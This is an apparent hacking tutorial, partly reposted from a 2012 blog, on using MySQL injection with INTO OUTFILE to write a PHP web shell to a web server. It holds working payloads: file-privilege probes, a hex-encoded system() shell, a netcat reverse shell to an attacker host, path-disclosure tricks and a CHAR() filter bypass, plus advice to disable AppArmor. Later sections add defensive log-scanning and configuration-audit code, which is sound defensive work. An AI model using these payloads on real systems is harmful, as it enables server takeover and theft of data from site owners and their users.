SQL Injection With File Upload

1- chmod -R 777 (for the vulnerable lab app only; also check the AppArmor module)

**************************
Disable and remove AppArmor on Ubuntu-based Linux distributions-

AppArmor is a Linux kernel security module similar to SELinux, but it is supposed to be easier to set up and maintain. There are many reasons to disable it; the primary one is that its security features can get in the way of the operation of legitimate applications. In this article I am going to show you how to disable AppArmor on your Ubuntu-based Linux distribution.

1- This is actually very simple. First we stop the apparmor service using the following command:
sudo /etc/init.d/apparmor stop

2- The next thing to do is to stop this service from starting at boot time, using the Debian update-rc.d tool:
sudo update-rc.d -f apparmor remove

To test file upload with SQLi-
Now give the necessary read, write and execute permissions, so that there is no error while performing operations on these files.
chmod -R 777 /var/www/html/dvwa/
*************************

2- Access to "mysql.user" table and file privileges
?id=-1' union all select 1,2,group_concat(user,0x3a,file_priv) from mysql.user--+

Your Password:debian-sys-maint:Y,root:Y,guest:Y

e.g. if it results in the output:
Root:Y
then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell. Next, find the path to upload the shell to.

3- Convert the string below to hex.
“<?php system($_GET[‘cmd’]); ?>”
0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d

4- Run the query below-

?id=-1'  Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3 INTO OUTFILE '/var/www/shell.php'--+

5- Access the page below-

/shell.php?cmd=nc <attacker ip> <port> -e /bin/bash

uid=33(www-data) gid=33(www-data) groups=33(www-data)

6- Done.
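From the defender's side, the requests in steps 2 to 5 leave recognizable traces in the web server access log. The following added example (not code from the original post) scans log lines for them; the rule names, the log format and the sample lines are assumptions, and the hex literal in the sample decodes to a benign "<?php echo 1; ?>".

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the requests on this page; rule names are illustrative.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "priv_probe": re.compile(r"\bfile_priv\b|\bmysql\.user\b", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "php_tag": re.compile(r"<\?php|<\?=|char\(\s*60\s*,\s*63\s*\)", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})", re.I)

# Constructed sample (assumed combined log format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /view.php?id=25 HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /view.php?id=-1%27%20union%20all'
    '%20select%201,2,group_concat(user,0x3a,file_priv)%20from%20mysql.user--+ HTTP/1.1" 200 640',
    '203.0.113.7 - - [12/Mar/2024:10:01:30 +0000] "GET /view.php?id=-1%27%20Union%20Select%201,'
    '0x3c3f706870206563686f20313b203f3e,3%20INTO%20OUTFILE%20%27/var/www/x.php%27--+ HTTP/1.1" 200 0',
]


def normalize(target):
    """Undo up to two layers of URL encoding and expose hex-encoded strings."""
    for _ in range(2):
        target = unquote_plus(target)
    target = re.sub(r"/\*.*?\*/", " ", target)  # inline comments used as padding
    decoded = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(target)]
    return " ".join([target] + decoded)


def scan_line(line):
    """Return (client, sorted rule names) for a flagged log line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    text = normalize(m.group(2))
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return (m.group(1), hits) if hits else None


def triage(lines):
    """A request that reaches INTO OUTFILE/DUMPFILE is rated critical."""
    flagged = filter(None, map(scan_line, lines))
    return [(ip, "critical" if "file_write" in hits else "high", hits)
            for ip, hits in flagged]
```

Calling triage(SAMPLE_LOG) flags the privilege probe as high and the file-write request as critical; the plain id=25 request is not flagged.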
++++++++++++++++++++++++++++++++++++++++++++++++++
More details-

INTO OUTFILE uploading your shell with MySQL Injection

This is not used a lot, but if the database user you find is either the root user or a user granted root permissions, and it has the privileges, we will be able to upload a shell with MySQL injection.
I will explain it step by step.
1. Find out if it's the root user (we do that by using user() in our vulnerable column).
2. If it's the root user, we have to check the privileges of the user.
3. We have to find the full path of the current user.
4. We have to test if the server has 'magic quotes' on or not (IMPORTANT!).
5. Take over time :D.
So let's explain it some more. First we need to find out if our user is root; we do that with the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user—
So in my example I am currently the root user. I'm like 'yay cool', but we aren't there yet, my young Padawans!
Now that we know it's root, we check its privileges by using the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,concat_ws(‘:’,user,file_priv),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20—
If it results in the output:
Root:Y
then we have a bingo, and we will be able to use INTO OUTFILE to upload a shell. Now let's continue and see if we can find the FULL PATH to upload a shell to (the full path is important, as a user is bound to a certain path with their site).
Sometimes we can get lucky and get the full path, but not all SQL errors will spit it out.

Tips & tricks to trigger full path disclosure:
1. Use [] before the = sign; this will error out as it's not valid.
2. If that doesn't work, use tamper data / livehttpeditor / cookie editor to edit your PHPSESSIONID or COOKIE to 0, then refresh (as the session / cookie won't be valid, it will again error out).
Now that we have found the full path, we can try to upload a BASIC PHP shell to execute commands for us. We do that by using INTO OUTFILE. Let me show you a quick example:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4,”Hello world”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE /home/mx/public_html/hello.php--
If we are allowed to create a new file in that directory, hello.php will now have been created on www.site.com, as my full path is: /home/mx/public_html

Common errors:
1. Error code 13 (the directory in which you are trying to create the new file is not writeable (777)).
2. Error code 2 (wrong path).
Now, to upload a shell, we use this basic code:
<?php system($_GET[‘cmd’]); ?>
So our query would look like:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, “<?php system($_GET[‘cmd’]); ?>”,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—
If the page returns without error code 13 or 2, or any other error code, it should have been uploaded.
We can check by going to it and entering ?cmd=ls –la like the following:
www.site.com/shell.php?cmd=ls –la
This should show us the current directory and files within.
But there wasn’t an error and my shell is still not there?
Well, in that case we would have to use Acunetix to do a SIMPLE folder scan, and we change our path to whatever folder shows up. Imagine they have an /images folder; then we just add /images to our path.
Magic quotes is on and I can't upload my shell?!
No worries, we can bypass that using CHAR(). Some sites with 'magic quotes' on will filter out the <? or ?> signs when uploading a shell, and only CHAR will work, by using HACKBAR to put <? and ?> into CHAR(60,63) and CHAR(63,62).
This will result in the following query:
www.site.com/view.php?id=25 and 1=0 union all select 1,2,3,4, CHAR(60,63)  “system($_GET[‘cmd’]); “  CHAR(63,62),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 INTO OUTFILE “/home/mx/public_html/shell.php—

from-http://0haxor.blogspot.com/2012/08/into-outfile-uploading-your-shell-with.html

Comments

  1. Really cool stuff. Lately I have tried this trick. Unfortunately, writing the file was unsuccessful. I did some research, and I found that if I run @@global.secure_file_priv, I get ===> /var/lib/mysql-files/ which means it's the only directory mysql can write. And I can only open file in public/. If anyone has an idea please reply.

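The FILE-privilege check in the article and the secure_file_priv value reported in the comment above decide together whether INTO OUTFILE can reach the web root. The following added example (not code from the original post) encodes that decision for a configuration review; the function names, the empty secure_file_priv assumed for the lab, the "webapp" account and the web-root paths are assumptions.

```python
import posixpath


def inside(path, parent):
    """Lexical check: is `path` equal to or below `parent`? (absolute POSIX paths)"""
    path, parent = posixpath.normpath(path), posixpath.normpath(parent)
    return posixpath.commonpath([path, parent]) == parent


def outfile_scope(secure_file_priv):
    """Classify a secure_file_priv value (None stands for SQL NULL)."""
    if secure_file_priv is None:
        return "disabled"        # import/export statements are refused
    if secure_file_priv == "":
        return "unrestricted"    # any path the mysqld OS account can write
    return "directory"           # confined to this one directory


def audit(secure_file_priv, web_roots, app_account, file_priv):
    """Return (exposed, findings) for the INTO OUTFILE-to-web-root path.

    file_priv maps account name -> 'Y'/'N' as read from mysql.user.
    """
    findings = []
    scope = outfile_scope(secure_file_priv)
    has_file = file_priv.get(app_account) == "Y"
    if has_file:
        findings.append(f"{app_account}: FILE privilege granted, revoke it")
    reachable = []
    if scope == "unrestricted":
        findings.append("secure_file_priv is empty, set a dedicated directory or NULL")
        reachable = list(web_roots)
    elif scope == "directory":
        reachable = [r for r in web_roots
                     if inside(r, secure_file_priv) or inside(secure_file_priv, r)]
        findings += [f"secure_file_priv overlaps web root {r}" for r in reachable]
    return has_file and bool(reachable), findings


# "root:Y" and /var/lib/mysql-files/ come from the page; the rest is assumed.
LAB = audit("", ["/var/www/html/dvwa/"], "root", {"root": "Y", "guest": "Y"})
COMMENTER = audit("/var/lib/mysql-files/", ["/var/www/html/"], "root", {"root": "Y"})
HARDENED = audit(None, ["/var/www/html/"], "webapp", {"root": "Y", "webapp": "N"})
```

LAB is reported as exposed, COMMENTER is not exposed but still carries the FILE-privilege finding, and HARDENED returns no findings.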